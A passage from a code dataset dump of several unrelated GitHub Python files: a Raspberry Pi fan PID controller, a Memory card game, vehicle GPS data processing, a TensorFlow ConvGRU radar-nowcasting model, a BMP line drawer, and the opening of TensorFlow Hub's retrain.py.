1\")\n sleep(100)\ndef getCPUtemperature():\n res = os.popen('vcgencmd measure_temp').readline()\n temp =(res.replace(\"temp=\",\"\").replace(\"'C\\n\",\"\"))\n #print(\"temp is {0}\".format(temp)) #Uncomment here for testing\n return temp\ndef fanOFF():\n myPWM.ChangeDutyCycle(0) # switch fan off\n return()\ndef handleFan():\n global fanSpeed,sum\n actualTemp = float(getCPUtemperature())\n diff=actualTemp-desiredTemp\n sum=sum+diff\n pDiff=diff*pTemp\n iDiff=sum*iTemp\n fanSpeed=pDiff +iDiff\n if fanSpeed>100:\n fanSpeed=100\n if fanSpeed<15:\n fanSpeed=0\n if sum>100:\n sum=100\n if sum<-100:\n sum=-100\n message=\"actualTemp %4.2f TempDiff %4.2f pDiff %4.2f iDiff %4.2f fanSpeed %5d\" % (actualTemp,diff,pDiff,iDiff,fanSpeed)\n #print message #Uncomment here for testing\n\n log = open(logFile,'w')\n log.write(message)\n\n speed = open(speedFile,'w')\n speed.write((\"{0}\".format(fanSpeed)))\n\n myPWM.ChangeDutyCycle(fanSpeed)\n return()\n#def handleBattery():\n# #print (GPIO.input(batterySensPin))\n# if GPIO.input(batterySensPin)==0:\n# (\"Shutdown()\")\n# sleep(5)\n# Shutdown()\n# return()\ndef setPin(mode): # A little redundant function but useful if you want to add logging\n GPIO.output(fanPin, mode)\n return()\ntry:\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(fanPin, GPIO.OUT)\n myPWM=GPIO.PWM(fanPin,50)\n myPWM.start(50)\n# GPIO.setup(batterySensPin, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n GPIO.setwarnings(False)\n fanOFF()\n while True:\n handleFan()\n# handleBattery()\n sleep(5) # Read the temperature every 5 sec, increase or decrease this limit if you want\nexcept KeyboardInterrupt: # trap a CTRL+C keyboard interrupt\n fanOFF()\n GPIO.cleanup() # resets all GPIO ports used by this program\n","repo_name":"cnaslain/pwm_mosfet_GPIO_17","sub_path":"pwm_mosfet_GPIO_17.py","file_name":"pwm_mosfet_GPIO_17.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43253377341","text":"# implementation of card game - Memory\n\nimport simplegui\nimport random\n\nCARD_WIDTH = 50\nCARD_HEIGHT = 100\n#stores the card values (16 cards, 8 combinations)\nnumbers = []\nexposed = []\ncards_revealed = 0\ncards_idx_of_turn = []\nturns = 0\n\n# helper function to initialize globals\ndef new_game():\n global numbers, exposed, cards_revealed\n \n numbers = range(8)\n numbers.extend(numbers)\n random.shuffle(numbers)\n \n turns = 0\n label.set_text(\"Turns = \" + str(turns))\n cards_revealed = 0\n exposed = []\n for i in range(len(numbers)):\n exposed.append(False)\n\n# define event handlers\ndef mouseclick(pos):\n global cards_revealed, cards_idx_of_turn, turns\n \n card_idx = pos[0] / CARD_WIDTH\n \n if not exposed[card_idx]:\n if cards_revealed == 1:\n turns += 1\n label.set_text(\"Turns = \" + str(turns))\n \n if cards_revealed < 2:\n cards_revealed += 1\n \n cards_idx_of_turn.append(card_idx)\n \n else:\n #check match\n idx_card_1 = cards_idx_of_turn.pop()\n idx_card_2 = cards_idx_of_turn.pop()\n \n if not numbers[idx_card_1] == numbers[idx_card_2]:\n exposed[idx_card_1] = False\n exposed[idx_card_2] = False\n \n cards_revealed = 1\n cards_idx_of_turn.append(card_idx)\n \n exposed[card_idx] = True\n \n# cards are logically 50x100 pixels in size \ndef draw(canvas):\n for card_index in range(len(numbers)):\n x = CARD_WIDTH * card_index + 10\n y = CARD_HEIGHT / 2 + 10\n colors = ['white', 'green', 'blue', 'yellow', 'red', 'gray', 'aliceblue', 'purple', '#ddd']\n\n if card_index > 8:\n color = colors[card_index - 8]\n else:\n color = colors[card_index]\n \n line_width = 50\n \n canvas.draw_text(str(numbers[card_index]), (x, y), 50, 'white')\n \n if (exposed[card_index] == False):\n canvas.draw_line((card_index * CARD_WIDTH + CARD_WIDTH/2, 0), (card_index * CARD_WIDTH + CARD_WIDTH/2, CARD_HEIGHT), CARD_WIDTH, color)\n \n\n\n# create frame and add a button and labels\nframe = simplegui.create_frame(\"Memory\", 800, 100)\nframe.add_button(\"Reset\", new_game)\nlabel = frame.add_label(\"Turns = 0\")\n\n# register event handlers\nframe.set_mouseclick_handler(mouseclick)\nframe.set_draw_handler(draw)\n\n# get things rolling\nnew_game()\nframe.start()\n","repo_name":"studiojms/practice-python","sub_path":"memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5046984625","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 28 11:46:07 2019\n\n@author: tyuan\nto get data of brezil about vehicles location\n\"\"\"\nimport numpy as np\n\nimport json\n\nuni_time = list(np.load('/Users/eva/Documents/GitHub/vehicle_data_bresil/time_30.npy'))\n\nfor i in range(1,11):\n if i <10:\n name = '0'+str(i)\n else:\n name = str(i) \n fname_sub = '2014-10-'+name+'.txt'\n dic = '/Users/eva/Documents/GitHub/vehicle_data_bresil/'\n# fname_sub = 'test.txt'\n fname = dic +fname_sub\n #with open(, 'r') as f:\n\n# s=[]\n d ={}\n x = []\n with open(fname, 'r', encoding='ascii') as f:\n for je in f.readlines():\n tm = je[:-1].split(',')\n if tm[1] in uni_time:\n# s.append has_key(tm)\n if tm[1] in d.keys():\n d[tm[1]].append(tm[4:6])\n else:\n d[tm[1]] = [tm[4:6]]\n \n x.append(tm[4:6])\n x_tem = np.array(x)\n print(min(x_tem[:,0]))\n \n print(max(x_tem[:,0]))\n \n print(min(x_tem[:,1]))\n print(max(x_tem[:,1]))\n \n \n\n# s = [j[:-1].split(',') for j in f.readlines()]\n\n \n# list_ndarray = np.array(s)\n# d={}\n## if i ==1:\n## uni_time = np.unique(list_ndarray[:,1])[0:-1:600]\n#\n# for time in uni_time:\n# d[time] = list_ndarray[list_ndarray[:,1] == time][:,4:6].tolist()\n# \n# np.save(dic+'dic'+name+'.npy',d) \n with open(dic+'dic_30'+name+'.json','w') as outfile:\n json.dump(d, outfile, ensure_ascii=False)\n# outfile.write('\\n')\n \n# \n# with open(dic+'dic'+name+'.json', 'r') as f:\n# diction = json.load(fp=f)\n\n\n","repo_name":"akshaykatyal/EdgeServerResourceAllocation","sub_path":"multiagent/multiagent/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31271684251","text":"import tensorflow\nimport numpy\nimport os\nimport random\nimport time\nimport cv2\n\n# data_dir='E:/SRAD2018/train'\n# data_dir='/media/zhao/新加卷/SRAD2018/train'\ndata_dir='/home/jxzhao/tianchi/SRAD2018/train'\nlog_dir='log/'\nmodel_dir='model/'\ninit_lr=0.001\ndecay_rate=0.01\nbatch_file=1\nbatch_rad=1\nbatch_size=batch_file*batch_rad\nmax_step=300000//batch_size+1\ninput_channel=1\nencode_channel1=4\nencode_channel2=8\nencode_channel3=16\nencode_channel4=32\n\ndef cnn_encode(x):\n with tensorflow.variable_scope('cnn_encode', reuse=tensorflow.AUTO_REUSE):\n encode_w1=tensorflow.get_variable('w1', [3,3,input_channel,encode_channel1], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n encode_b1=tensorflow.get_variable('b1', encode_channel1, initializer=tensorflow.constant_initializer(0))\n encode_z1=tensorflow.nn.conv2d((x-128)/128,encode_w1,[1,2,2,1],'SAME')+encode_b1\n encode_z1=tensorflow.contrib.layers.layer_norm(encode_z1,scope='ln1')\n encode_z1=tensorflow.nn.selu(encode_z1)\n\n encode_w2=tensorflow.get_variable('w2', [3,3,encode_channel1,encode_channel2], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n encode_b2=tensorflow.get_variable('b2', encode_channel2, initializer=tensorflow.constant_initializer(0))\n encode_z2=tensorflow.nn.conv2d(encode_z1,encode_w2,[1,2,2,1],'SAME')+encode_b2\n encode_z2=tensorflow.contrib.layers.layer_norm(encode_z2,scope='ln2')\n encode_z2=tensorflow.nn.selu(encode_z2)\n\n encode_w3=tensorflow.get_variable('w3', [3,3,encode_channel2,encode_channel3], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n encode_b3=tensorflow.get_variable('b3', encode_channel3, initializer=tensorflow.constant_initializer(0))\n encode_z3=tensorflow.nn.conv2d(encode_z2,encode_w3,[1,2,2,1],'SAME')+encode_b3\n encode_z3=tensorflow.contrib.layers.layer_norm(encode_z3,scope='ln3')\n encode_z3=tensorflow.nn.selu(encode_z3)\n\n encode_w4=tensorflow.get_variable('w4', [3,3,encode_channel3,encode_channel4], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n encode_b4=tensorflow.get_variable('b4', encode_channel4, initializer=tensorflow.constant_initializer(0))\n encode_z4=tensorflow.nn.conv2d(encode_z3,encode_w4,[1,2,2,1],'SAME')+encode_b4\n encode_z4=tensorflow.contrib.layers.layer_norm(encode_z4,scope='ln4')\n encode_z4=tensorflow.nn.tanh(encode_z4, name='encode_image')\n\n return encode_z4\n\ndef cnn_decode(x):\n with tensorflow.variable_scope('cnn_decode',reuse=tensorflow.AUTO_REUSE):\n decode_w1=tensorflow.get_variable('w1', [3,3,encode_channel4,encode_channel3], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n decode_b1=tensorflow.get_variable('b1', encode_channel3, initializer=tensorflow.constant_initializer(0))\n decode_z1=tensorflow.nn.conv2d(tensorflow.image.resize_nearest_neighbor(x,[63,63]),decode_w1,[1,1,1,1],'SAME')+decode_b1\n decode_z1=tensorflow.contrib.layers.layer_norm(decode_z1,scope='ln1')\n decode_z1=tensorflow.nn.selu(decode_z1)\n\n decode_w2=tensorflow.get_variable('w2', [3,3,encode_channel3,encode_channel2], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n decode_b2=tensorflow.get_variable('b2', encode_channel2, initializer=tensorflow.constant_initializer(0))\n decode_z2=tensorflow.nn.conv2d(tensorflow.image.resize_nearest_neighbor(decode_z1,[126,126]),decode_w2,[1,1,1,1],'SAME')+decode_b2\n decode_z2=tensorflow.contrib.layers.layer_norm(decode_z2,scope='ln2')\n decode_z2=tensorflow.nn.selu(decode_z2)\n\n decode_w3=tensorflow.get_variable('w3', [3,3,encode_channel2,encode_channel1], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n decode_b3=tensorflow.get_variable('b3', encode_channel1, initializer=tensorflow.constant_initializer(0))\n decode_z3=tensorflow.nn.conv2d(tensorflow.image.resize_nearest_neighbor(decode_z2,[251,251]),decode_w3,[1,1,1,1],'SAME')+decode_b3\n decode_z3=tensorflow.contrib.layers.layer_norm(decode_z3,scope='ln3')\n decode_z3=tensorflow.nn.selu(decode_z3)\n\n decode_w4=tensorflow.get_variable('w4', [3,3,encode_channel1,input_channel], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n decode_b4=tensorflow.get_variable('b4', input_channel, initializer=tensorflow.constant_initializer(0))\n decode_z4=tensorflow.nn.conv2d(tensorflow.image.resize_nearest_neighbor(decode_z3,[501,501]),decode_w4,[1,1,1,1],'SAME')+decode_b4\n decode_z4=tensorflow.contrib.layers.layer_norm(decode_z4,scope='ln4')\n decode_z4=tensorflow.nn.tanh(decode_z4)\n decode_z4=tensorflow.clip_by_value(decode_z4*128+128,0,255,name='decode_image')\n\n return decode_z4\n\ndef convgru_encode(h_old,x):\n with tensorflow.variable_scope('convgru_encode', reuse=tensorflow.AUTO_REUSE):\n rxw=tensorflow.get_variable('rxw',[3,3,32,32])\n rhw=tensorflow.get_variable('rhw',[3,3,32,32])\n rb=tensorflow.get_variable('rb',32)\n rxw_r=tensorflow.nn.conv2d(x,rxw,[1,1,1,1],'SAME')\n rhw_r=tensorflow.nn.conv2d(h_old,rhw,[1,1,1,1],'SAME')\n r=tensorflow.nn.sigmoid(rxw_r+rhw_r+rb)\n\n uxw=tensorflow.get_variable('uxw',[3,3,32,32])\n uhw=tensorflow.get_variable('uhw',[3,3,32,32])\n ub=tensorflow.get_variable('ub',32)\n uxw_r=tensorflow.nn.conv2d(x,uxw,[1,1,1,1],'SAME')\n uhw_r=tensorflow.nn.conv2d(h_old,uhw,[1,1,1,1],'SAME')\n u=tensorflow.nn.sigmoid(uxw_r+uhw_r+ub)\n\n txw=tensorflow.get_variable('txw',[3,3,32,32])\n thw=tensorflow.get_variable('thw',[3,3,32,32])\n tb=tensorflow.get_variable('tb',32)\n txw_r=tensorflow.nn.conv2d(x,txw,[1,1,1,1],'SAME')\n thw_r=tensorflow.nn.conv2d(r*h_old,thw,[1,1,1,1],'SAME')\n t=tensorflow.nn.tanh(txw_r+thw_r+tb)\n\n h_new=(1-u)*h_old+u*t\n return h_new\n\ndef convgru_decode(h_old):\n with tensorflow.variable_scope('convgru_decode', reuse=tensorflow.AUTO_REUSE):\n rhw=tensorflow.get_variable('rhw',[3,3,32,32])\n rb=tensorflow.get_variable('rb',32)\n rhw_r=tensorflow.nn.conv2d(h_old,rhw,[1,1,1,1],'SAME')\n r=tensorflow.nn.sigmoid(rhw_r+rb)\n\n uhw=tensorflow.get_variable('uhw',[3,3,32,32])\n ub=tensorflow.get_variable('ub',32)\n uhw_r=tensorflow.nn.conv2d(h_old,uhw,[1,1,1,1],'SAME')\n u=tensorflow.nn.sigmoid(uhw_r+ub)\n\n thw=tensorflow.get_variable('thw',[3,3,32,32])\n tb=tensorflow.get_variable('tb',32)\n thw_r=tensorflow.nn.conv2d(r*h_old,thw,[1,1,1,1],'SAME')\n t=tensorflow.nn.tanh(thw_r+tb)\n\n h_new=(1-u)*h_old+u*t\n return h_new\n\ndef gru_process(input_code):\n all_output_encode=[]\n init_hide=numpy.zeros([batch_size,32,32,32]).astype(numpy.float32)\n for i in range(31):\n if i==0:\n output_hide=convgru_encode(init_hide,input_code[:,i,:,:,:])\n all_output_encode.append(output_hide)\n else:\n output_hide=convgru_encode(output_hide,input_code[:,i,:,:,:])\n all_output_encode.append(tensorflow.reshape(output_hide,[batch_size,1,32,32,32]))\n\n all_output_decode=[]\n for i in range(30):\n output_hide=convgru_decode(output_hide)\n all_output_decode.append(output_hide)\n\n return all_output_encode, all_output_decode\n\nlen([x.name for x in tensorflow.get_collection(tensorflow.GraphKeys.GLOBAL_VARIABLES)])\n\ntrain_image=tensorflow.placeholder(tensorflow.float32,[batch_size,31,501,501,1],name='train_image')\nanswer_image=tensorflow.placeholder(tensorflow.float32,[batch_size,30,501,501,1],name='answer_image')\nglobal_step = tensorflow.get_variable('global_step',initializer=0,trainable=False)\nlearning_rate=tensorflow.train.exponential_decay(init_lr,global_step,max_step*30,decay_rate)\nwhich_opt = tensorflow.get_variable('which_opt',initializer=0,trainable=False)\n\ncnn_encode_result=tensorflow.map_fn(cnn_encode,train_image,name='cnn_encode_result')\ngru_result=gru_process(cnn_encode_result)\npre_result=tensorflow.stack(gru_result[1],1)\ncnn_decode_result=tensorflow.map_fn(cnn_decode,pre_result,name='cnn_decode_result')\n\nloss=tensorflow.losses.mean_squared_error(answer_image[:,which_opt,:,:,:],cnn_decode_result[:,which_opt,:,:,:])\n\nminimize=tensorflow.train.AdamOptimizer(learning_rate).minimize(loss,global_step=global_step,name='minimize')\n\nSaver = tensorflow.train.Saver(max_to_keep=0,filename='cnn_convgru')\n\nSession=tensorflow.Session()\nif tensorflow.train.latest_checkpoint(model_dir):\n Saver.restore(Session,tensorflow.train.latest_checkpoint(model_dir))\nelse:\n Session.run(tensorflow.global_variables_initializer())\n\ntensorflow.summary.scalar('loss', loss)\ntensorflow.summary.image('answer_images', answer_image[0,:,:,:,:], 10)\ntensorflow.summary.image('output_images', cnn_decode_result[0], 10)\nmerge_all = tensorflow.summary.merge_all()\nFileWriter = tensorflow.summary.FileWriter(log_dir, Session.graph)\n\nfor _ in range(max_step):\n all_file=os.listdir(data_dir)\n pick_files=random.sample(all_file,batch_file)\n files=[os.path.join(data_dir,x) for x in pick_files]\n all_rad=[os.listdir(x) for x in files]\n pick_rads=[random.sample(x,batch_rad) for x in all_rad]\n rads=[[os.path.join(files[x],y) for y in pick_rads[x]] for x in range(len(files))]\n all_image_dir=[]\n for x in rads:\n for y in x:\n image_dir=[os.path.join(y,z) for z in os.listdir(y)]\n image_dir.sort()\n all_image_dir.append(image_dir)\n all_image=[]\n for x in all_image_dir:\n k1=[]\n for y in x:\n k1.append(cv2.imread(y))\n all_image.append(k1)\n all_image=numpy.array(all_image)\n try:\n for j in range(30):\n Session.run(minimize,feed_dict={train_image:all_image[:,:31,:,:,0:1],answer_image:all_image[:,31:,:,:,0:1],which_opt:j})\n if Session.run(global_step)%3000==30:\n summary = Session.run(merge_all, feed_dict={train_image:all_image[:,:31,:,:,0:1],answer_image:all_image[:,31:,:,:,0:1],which_opt:10})\n FileWriter.add_summary(summary, Session.run(global_step))\n Saver.save(Session, model_dir, global_step)\n print(Session.run(loss,feed_dict={train_image:all_image[:,:31,:,:,0:1],answer_image:all_image[:,31:,:,:,0:1]}))\n except:\n with open('log/异常数据目录.txt','a') as f:\n f.write('异常数据:%s\\n'%(rads))\n\n print(Session.run(global_step))","repo_name":"zhaojinxi/tianchi","sub_path":"全球气象AI挑战赛/cnn_convgru/cnn_convgru.py","file_name":"cnn_convgru.py","file_ext":"py","file_size_in_byte":10510,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"11666512272","text":"#line.py\n#Por Luis Diego Fernandez\n#v-1.20.20\n\nimport sys\nimport math\nimport time\nimport bmp_maker\n\n# image attributes\nwidth = 400\nheight = 400\nx_point_1 = 1\ny_point_1 = 1\nx_point_2 = 1\ny_point_2 = 1\nbits_per_pixel = 32\n\nprint(\"BMP image maker V-2\\n\")\n\nif(len(sys.argv) != 7):\n\tprint(\"Incorrect number of arguments entered\")\n\tprint(\"Enter the necessary arguments: width lenght x_point_1 y_point_1 x_point_2 y_point_2\")\n\tsys.exit()\ntry:\n\twidth = int(sys.argv[1])\n\theight = int(sys.argv[2])\n\tx_point_1 = float(sys.argv[3])\n\ty_point_1 = float(sys.argv[4])\n\tx_point_2 = float(sys.argv[5])\n\ty_point_2 = float(sys.argv[6])\n\nexcept ValueError:\n\tprint(\"Use only integer numbers\")\n\tsys.exit()\n\n\nif (width < 1):\n\twidth = 1\n\nif (height < 1):\n\theight = 1\n\nif (x_point_1 < -1 or x_point_1 > 1 or y_point_1 < -1 or y_point_1 > 1):\n\tprint(\"The point 1 is out of range\")\n\nif (x_point_2 < -1 or x_point_2 > 1 or y_point_2 < -1 or y_point_2 > 1):\n\tprint(\"The point 2 is out of range\")\n\nnewBmpImage = bmp_maker.bmpImage()\nnewBmpImage.glCreateWindow(width, height)\nnewBmpImage.glClearColor(0,0,0)\nnewBmpImage.glClear()\n\nnewBmpImage.glColor(1,1,1);\n\nnewBmpImage.glLine(x_point_1,y_point_1,x_point_2,y_point_2)\n\nnewBmpImage.glFinish()\n\nprint(\"Done\")\n","repo_name":"LuisDiego19FV/Graficas-SR2","sub_path":"line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28431453068","text":"r\"\"\"Simple transfer learning with image modules from TensorFlow Hub.\n\nWARNING: This code is deprecated in favor of\nhttps://github.com/tensorflow/hub/tree/master/tensorflow_hub/tools/make_image_classifier\n\nThis example shows how to train an image classifier based on any\nTensorFlow Hub module that computes image feature vectors. By default,\nit uses the feature vectors computed by Inception V3 trained on ImageNet.\nFor more options, search https://tfhub.dev for image feature vector modules.\n\nThe top layer receives as input a 2048-dimensional vector (assuming\nInception V3) for each image. We train a softmax layer on top of this\nrepresentation. If the softmax layer contains N labels, this corresponds\nto learning N + 2048*N model parameters for the biases and weights.\n\nHere's an example, which assumes you have a folder containing class-named\nsubfolders, each full of images for each label. The example folder flower_photos\nshould have a structure like this:\n\n~/flower_photos/daisy/photo1.jpg\n~/flower_photos/daisy/photo2.jpg\n...\n~/flower_photos/rose/anotherphoto77.jpg\n...\n~/flower_photos/sunflower/somepicture.jpg\n\nThe subfolder names are important, since they define what label is applied to\neach image, but the filenames themselves don't matter. (For a working example,\ndownload http://download.tensorflow.org/example_images/flower_photos.tgz\nand run tar xzf flower_photos.tgz to unpack it.)\n\nOnce your images are prepared, and you have pip-installed tensorflow-hub and\na sufficiently recent version of tensorflow, you can run the training with a\ncommand like this:\n\n```bash\npython retrain.py --image_dir ~/flower_photos\n```\n\nYou can replace the image_dir argument with any folder containing subfolders of\nimages. The label for each image is taken from the name of the subfolder it's\nin.\n\nThis produces a new model file that can be loaded and run by any TensorFlow\nprogram, for example the tensorflow/examples/label_image sample code.\n\nBy default this script will use the highly accurate, but comparatively large and\nslow Inception V3 model architecture. It's recommended that you start with this\nto validate that you have gathered good training data, but if you want to deploy\non resource-limited platforms, you can try the `--tfhub_module` flag with a\nMobilenet model. For more information on Mobilenet, see\nhttps://research.googleblog.com/2017/06/mobilenets-open-source-models-for.html\n\nFor example:\n\nRun floating-point version of Mobilenet:\n\n```bash\npython retrain.py --image_dir ~/flower_photos \\\n --tfhub_module https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/feature_vector/3\n```\n\nRun Mobilenet, instrumented for quantization:\n\n```bash\npython retrain.py --image_dir ~/flower_photos/ \\\n --tfhub_module https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/quantops/feature_vector/3\n```\n\nThese instrumented models can be converted to fully quantized mobile models via\nTensorFlow Lite.\n\nThere are different Mobilenet models to choose from, with a variety of file\nsize and latency options.\n - The first number can be '100', '075', '050', or '025' to control the number\n of neurons (activations of hidden layers); the number of weights (and hence\n to some extent the file size and speed) shrinks with the square of that\n fraction.\n - The second number is the input image size. You can choose '224', '192',\n '160', or '128', with smaller sizes giving faster speeds.\n\nTo use with TensorBoard:\n\nBy default, this script will log summaries to /tmp/retrain_logs directory\n\nVisualize the summaries with this command:\n\ntensorboard --logdir /tmp/retrain_logs\n\nTo use with Tensorflow Serving, run this tool with --saved_model_dir set\nto some increasingly numbered export location under the model base path, e.g.:\n\n```bash\npython retrain.py (... other args as before ...) \\\n --saved_model_dir=/tmp/saved_models/$(date +%s)/\ntensorflow_model_server --port=9000 --model_name=my_image_classifier \\\n --model_base_path=/tmp/saved_models/\n```\n\"\"\"\n# pylint: enable=line-too-long\n\nfrom absl import logging\n\nimport argparse\nimport collections\nfrom datetime import datetime\nimport hashlib\nimport os.path\nimport random\nimport re\nimport sys\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow.contrib import quantize as contrib_quantize\n\nFLAGS = None\n\nMAX_NUM_IMAGES_PER_CLASS = 2 ** 27 - 1 # ~134M\n\n# A module is understood as instrumented for quantization with TF-Lite\n# if it contains any of these ops.\nFAKE_QUANT_OPS = ('FakeQuantWithMinMaxVars',\n 'FakeQuantWithMinMaxVarsPerChannel')\n\n\ndef create_image_lists(image_dir, testing_percentage, validation_percentage):\n \"\"\"Builds a list of training images from the file system.\n\n Analyzes the sub folders in the image directory, splits them into stable\n training, testing, and validation sets, and returns a data structure\n describing the lists of images for each label and their paths.\n\n Args:\n image_dir: String path to a folder containing subfolders of images.\n testing_percentage: Integer percentage of the images to reserve for tests.\n validation_percentage: Integer percentage of images reserved for validation.\n\n Returns:\n An OrderedDict containing an entry for each label subfolder, with images\n split into training, testing, and validation sets within each label.\n The order of items defines the class indices.\n \"\"\"\n if not tf.gfile.Exists(image_dir):\n logging.error(\"Image directory '\" + image_dir + \"' not found.\")\n return None\n result = collections.OrderedDict()\n sub_dirs = sorted(x[0] for x in tf.gfile.Walk(image_dir))\n # The root directory comes first, so skip it.\n is_root_dir = True\n for sub_dir in sub_dirs:\n if is_root_dir:\n is_root_dir = False\n continue\n extensions = sorted(set(os.path.normcase(ext) # Smash case on Windows.\n for ext in ['JPEG', 'JPG', 'jpeg', 'jpg', 'png']))\n file_list = []\n dir_name = os.path.basename(\n # tf.gfile.Walk() returns sub-directory with trailing '/' when it is in\n # Google Cloud Storage, which confuses os.path.basename().\n sub_dir[:-1] if sub_dir.endswith('/') else sub_dir)\n\n if dir_name == image_dir:\n continue\n logging.info(\"Looking for images in '%s'\", dir_name)\n for extension in extensions:\n file_glob = os.path.join(image_dir, dir_name, '*.' + extension)\n file_list.extend(tf.gfile.Glob(file_glob))\n if not file_list:\n logging.warning('No files found')\n continue\n if len(file_list) < 20:\n logging.warning(\n 'WARNING: Folder has less than 20 images, which may cause issues.')\n elif len(file_list) > MAX_NUM_IMAGES_PER_CLASS:\n logging.warning(\n 'WARNING: Folder %s has more than %s images. Some images will '\n 'never be selected.', dir_name, MAX_NUM_IMAGES_PER_CLASS)\n label_name = re.sub(r'[^a-z0-9]+', ' ', dir_name.lower())\n training_images = []\n testing_images = []\n validation_images = []\n for file_name in file_list:\n base_name = os.path.basename(file_name)\n # We want to ignore anything after '_nohash_' in the file name when\n # deciding which set to put an image in, the data set creator has a way of\n # grouping photos that are close variations of each other. For example\n # this is used in the plant disease data set to group multiple pictures of\n # the same leaf.\n hash_name = re.sub(r'_nohash_.*$', '', file_name)\n # This looks a bit magical, but we need to decide whether this file should\n # go into the training, testing, or validation sets, and we want to keep\n # existing files in the same set even if more files are subsequently\n # added.\n # To do that, we need a stable way of deciding based on just the file name\n # itself, so we do a hash of that and then use that to generate a\n # probability value that we use to assign it.\n hash_name_hashed = hashlib.sha1(tf.compat.as_bytes(hash_name)).hexdigest()\n percentage_hash = ((int(hash_name_hashed, 16) %\n (MAX_NUM_IMAGES_PER_CLASS + 1)) *\n (100.0 / MAX_NUM_IMAGES_PER_CLASS))\n if percentage_hash < validation_percentage:\n validation_images.append(base_name)\n elif percentage_hash < (testing_percentage + validation_percentage):\n testing_images.append(base_name)\n else:\n training_images.append(base_name)\n result[label_name] = {\n 'dir': dir_name,\n 'training': training_images,\n 'testing': testing_images,\n 'validation': validation_images,\n }\n return result\n\n\ndef get_image_path(image_lists, label_name, index, image_dir, category):\n \"\"\"Returns a path to an image for a label at the given index.\n\n Args:\n image_lists: OrderedDict of training images for each label.\n label_name: Label string we want to get an image for.\n index: Int offset of the image we want. This will be moduloed by the\n available number of images for the label, so it can be arbitrarily large.\n image_dir: Root folder string of the subfolders containing the training\n images.\n category: Name string of set to pull images from - training, testing, or\n validation.\n\n Returns:\n File system path string to an image that meets the requested parameters.\n\n \"\"\"\n if label_name not in image_lists:\n logging.fatal('Label does not exist %s.', label_name)\n label_lists = image_lists[label_name]\n if category not in label_lists:\n logging.fatal('Category does not exist %s.', category)\n category_list = label_lists[category]\n if not category_list:\n logging.fatal('Label %s has no images in the category %s.',\n label_name, category)\n mod_index = index % len(category_list)\n base_name = category_list[mod_index]\n sub_dir = label_lists['dir']\n full_path = os.path.join(image_dir, sub_dir, base_name)\n return full_path\n\n\ndef get_bottleneck_path(image_lists, label_name, index, bottleneck_dir,\n category, module_name):\n \"\"\"Returns a path to a bottleneck file for a label at the given index.\n\n Args:\n image_lists: OrderedDict of training images for each label.\n label_name: Label string we want to get an image for.\n index: Integer offset of the image we want. This will be moduloed by the\n available number of images for the label, so it can be arbitrarily large.\n bottleneck_dir: Folder string holding cached files of bottleneck values.\n category: Name string of set to pull images from - training, testing, or\n validation.\n module_name: The name of the image module being used.\n\n Returns:\n File system path string to an image that meets the requested parameters.\n \"\"\"\n module_name = (module_name.replace('://', '~') # URL scheme.\n .replace('/', '~') # URL and Unix paths.\n .replace(':', '~').replace('\\\\', '~')) # Windows paths.\n return get_image_path(image_lists, label_name, index, bottleneck_dir,\n category) + '_' + module_name + '.txt'\n\n\ndef create_module_graph(module_spec):\n \"\"\"Creates a graph and loads Hub Module into it.\n\n Args:\n module_spec: the hub.ModuleSpec for the image module being used.\n\n Returns:\n graph: the tf.Graph that was created.\n bottleneck_tensor: the bottleneck values output by the module.\n resized_input_tensor: the input images, resized as expected by the module.\n wants_quantization: a boolean, whether the module has been instrumented\n with fake quantization ops.\n \"\"\"\n height, width = hub.get_expected_image_size(module_spec)\n with tf.Graph().as_default() as graph:\n resized_input_tensor = tf.placeholder(tf.float32, [None, height, width, 3])\n m = hub.Module(module_spec)\n bottleneck_tensor = m(resized_input_tensor)\n wants_quantization = any(node.op in FAKE_QUANT_OPS\n for node in graph.as_graph_def().node)\n return graph, bottleneck_tensor, resized_input_tensor, wants_quantization\n\n\ndef run_bottleneck_on_image(sess, image_data, image_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor):\n \"\"\"Runs inference on an image to extract the 'bottleneck' summary layer.\n\n Args:\n sess: Current active TensorFlow Session.\n image_data: String of raw JPEG data.\n image_data_tensor: Input data layer in the graph.\n decoded_image_tensor: Output of initial image resizing and preprocessing.\n resized_input_tensor: The input node of the recognition graph.\n bottleneck_tensor: Layer before the final softmax.\n\n Returns:\n Numpy array of bottleneck values.\n \"\"\"\n # First decode the JPEG image, resize it, and rescale the pixel values.\n resized_input_values = sess.run(decoded_image_tensor,\n {image_data_tensor: image_data})\n # Then run it through the recognition network.\n bottleneck_values = sess.run(bottleneck_tensor,\n {resized_input_tensor: resized_input_values})\n bottleneck_values = np.squeeze(bottleneck_values)\n return bottleneck_values\n\n\ndef ensure_dir_exists(dir_name):\n \"\"\"Makes sure the folder exists on disk.\n\n Args:\n dir_name: Path string to the folder we want to create.\n \"\"\"\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n\ndef create_bottleneck_file(bottleneck_path, image_lists, label_name, index,\n image_dir, category, sess, 